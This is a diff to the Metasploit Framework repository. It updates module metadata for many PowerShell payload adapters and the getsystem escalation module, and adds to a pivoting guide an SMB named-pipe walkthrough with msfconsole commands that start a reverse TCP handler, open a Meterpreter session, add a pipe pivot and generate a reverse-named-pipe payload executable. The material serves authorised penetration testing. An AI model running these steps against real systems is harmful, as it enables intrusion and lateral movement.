+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_hop_http",
@@ -177552,7 +177667,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_http",
@@ -177589,7 +177704,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore",
@@ -177627,7 +177742,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp",
@@ -177664,7 +177779,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp",
@@ -177701,7 +177816,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp",
@@ -177739,7 +177854,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp",
@@ -177777,7 +177892,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports",
@@ -177816,7 +177931,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns",
@@ -177856,7 +177971,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4",
@@ -177896,7 +178011,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns",
@@ -177934,7 +178049,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid",
@@ -177972,7 +178087,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp",
@@ -178008,7 +178123,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -178043,7 +178158,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/exec",
@@ -178079,7 +178194,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/loadlibrary",
@@ -178114,7 +178229,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/messagebox",
@@ -178152,7 +178267,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp",
@@ -178190,7 +178305,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid",
@@ -178229,7 +178344,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe",
@@ -178267,7 +178382,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp",
@@ -178309,7 +178424,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4",
@@ -178347,7 +178462,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid",
@@ -178385,7 +178500,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http",
@@ -178426,7 +178541,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https",
@@ -178464,7 +178579,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe",
@@ -178502,7 +178617,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp",
@@ -178544,7 +178659,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4",
@@ -178582,7 +178697,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid",
@@ -178620,7 +178735,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp",
@@ -178658,7 +178773,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps",
@@ -178694,7 +178809,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp",
@@ -178731,7 +178846,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid",
@@ -178767,7 +178882,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe",
@@ -178803,7 +178918,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp",
@@ -178844,7 +178959,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4",
@@ -178881,7 +178996,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid",
@@ -178917,7 +179032,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe",
@@ -178953,7 +179068,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp",
@@ -178994,7 +179109,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4",
@@ -179031,7 +179146,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid",
@@ -179066,7 +179181,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp",
@@ -179103,7 +179218,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp",
@@ -179140,7 +179255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp",
@@ -179177,7 +179292,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl",
@@ -179212,7 +179327,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp",
@@ -179248,7 +179363,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid",
@@ -179284,7 +179399,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe",
@@ -179319,7 +179434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp",
@@ -179359,7 +179474,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4",
@@ -179395,7 +179510,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid",
@@ -179430,7 +179545,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp",
@@ -179470,7 +179585,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4",
@@ -179506,7 +179621,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid",
@@ -179541,7 +179656,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp",
@@ -179576,7 +179691,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp",
@@ -179612,7 +179727,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp",
@@ -179649,7 +179764,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid",
@@ -179686,7 +179801,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe",
@@ -179722,7 +179837,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp",
@@ -179763,7 +179878,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4",
@@ -179800,7 +179915,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid",
@@ -179837,7 +179952,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http",
@@ -179876,7 +179991,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https",
@@ -179912,7 +180027,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp",
@@ -179953,7 +180068,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4",
@@ -179990,7 +180105,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid",
@@ -180027,7 +180142,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp",
@@ -180064,7 +180179,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps",
@@ -204132,7 +204247,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-14 16:55:43 +0000",
+    "mod_time": "2022-06-23 18:43:18 +0000",
    "path": "/modules/post/windows/escalate/getsystem.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/getsystem",
@@ -204140,6 +204255,14 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "Named Pipe Impersonation",
+        "Token Duplication",
+        "RPCSS",
+        "PrintSpooler",
+        "EFSRPC",
+        "EfsPotato"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -1,4 +1,5 @@
-# Overview of Pivoting And Its Benefits
+## Overview
+
 Whilst in test environments one is often looking at flat networks that only have one subnet and one network environment, the reality is that when it comes to pentests that are attempting to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in-between that are intended to keep these networks separate from one another.

 In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether that be physical network adapters, virtual network adapters, or a combination of both.
@@ -7,11 +8,14 @@ Once you have compromised a host that has multiple network adapters you can then

 Now that we understand some of the background, lets see this in action a bit more by setting up a sample environment and walking through some of Metasploit's pivoting features.

-# A Quick Note Before Continuing
+## Supported Session Types
+
 Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is mentioned below, keep in mind that this would also work with an SSH session as well. We have just resorted to using Meterpreter for this example for demonstration purposes.

-# Testing Pivoting
-## Target Environment Setup
+## Testing Pivoting
+
+### Target Environment Setup
+
 - Kali Machine
 	- Internal: None
 	- External: 172.19.182.171
@@ -153,7 +157,7 @@ IPv4 Active Routing Table
 msf6 post(multi/manage/autoroute) >
 ```

-# Using the Pivot
+## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:

 ```
@@ -210,11 +214,80 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
 [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
 msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
 ```
-# Pivoting External Tools
-## portfwd
+
+## SMB Named Pipe Pivoting in Meterpreter
+
+The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality.
+
+First open a Windows Meterpreter session to the pivot machine:
+
+```
+msf6 > use payload/windows/x64/meterpreter/reverse_tcp
+smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
+lhost => 172.19.182.171
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
+lport => 4578
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 172.19.182.171:4578 
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
+[*] Meterpreter session 1 opened (172.19.182.171:4578 -> 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500
+```
+
+Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows
+[+] Successfully created pipe pivot.
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
+
+Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   PIPEHOST  .                yes       Host of the pipe to connect to
+   PIPENAME  msf-pipe         yes       Name of the pipe to listen on
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
+pipehost => 169.254.16.221
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
